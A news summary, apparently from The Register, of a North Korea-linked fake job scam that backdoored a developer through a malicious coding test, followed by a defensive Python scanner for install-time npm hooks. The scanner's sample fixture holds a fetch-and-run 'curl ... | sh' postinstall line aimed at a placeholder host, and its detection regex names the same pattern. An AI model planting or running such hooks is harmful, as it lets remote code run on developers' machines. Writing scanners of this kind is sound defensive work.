A web developer in Serbia fell victim to a highly sophisticated job scam that began with a LinkedIn message from a fake blockchain company called Genusix Labs. The scam involved camera-on Zoom interviews with convincing fake employees, jokes about backdoors to lower his guard, and a malicious coding test hidden inside a dependency chain. Running the code triggered a shell script that downloaded a Go-based backdoor with RC4-encrypted communications, capable of stealing Chrome passwords, macOS Keychain data, crypto wallets, and more. In just 56 seconds before the developer killed his Wi-Fi, attackers collected 634 saved passwords and his MetaMask wallet data. Blockchain intelligence firm zeroShadow linked the attack to North Korean government-affiliated actors, the same group behind a prior $40M crypto heist at his former employer. The developer warns that scams are evolving toward full fake onboarding scenarios that could compromise CI/CD pipelines and developer registries.

From go.theregister.com
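The "coding test hidden inside a dependency chain" is the part a defender can triage before running anything. As an added example (not code from the article or the developer), this Python script assumes an npm-style project and walks every package.json under the tree, nested node_modules included, reporting install-time lifecycle hooks, which npm runs automatically on install, and script bodies that fetch or decode and then execute. The sample tree it scans is constructed inline.

```python
import json
import os
import re
import tempfile

# Hooks npm runs automatically during `npm install`, before any code is "run".
LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
# Fetch-and-execute or decode-and-execute shapes worth a human look.
SUSPICIOUS = re.compile(
    r"(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b|base64\s+(-d|--decode)|\bnode\s+-e\b",
    re.IGNORECASE,
)


def scan_tree(root):
    """Return findings for every package.json under root (node_modules included)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                scripts = json.load(fh).get("scripts") or {}
        except (OSError, ValueError) as exc:
            findings.append({"path": path, "hook": None, "reason": f"unreadable: {exc}"})
            continue
        for name, body in scripts.items():
            body = str(body)
            if name in LIFECYCLE:
                findings.append({"path": path, "hook": name, "reason": "runs on install", "script": body})
            elif SUSPICIOUS.search(body):
                findings.append({"path": path, "hook": name, "reason": "fetch/decode-and-exec", "script": body})
    return findings


def build_sample_tree():
    """Constructed sample: a clean root plus a hook buried two node_modules levels deep."""
    root = tempfile.mkdtemp(prefix="deptree-")
    nested = os.path.join(root, "node_modules", "ui-kit", "node_modules", "helper-utils")
    os.makedirs(nested)
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"scripts": {"start": "node index.js", "test": "jest"}}, fh)
    with open(os.path.join(nested, "package.json"), "w", encoding="utf-8") as fh:
        # placeholder.invalid is a constructed hostname, not one from the article
        json.dump({"scripts": {"postinstall": "curl -s https://placeholder.invalid/s.sh | sh",
                               "build": "echo ok"}}, fh)
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
```

Run it against a cloned "take-home test" before `npm install`; an empty result is not a clean bill of health, only the absence of the most obvious install-time hooks.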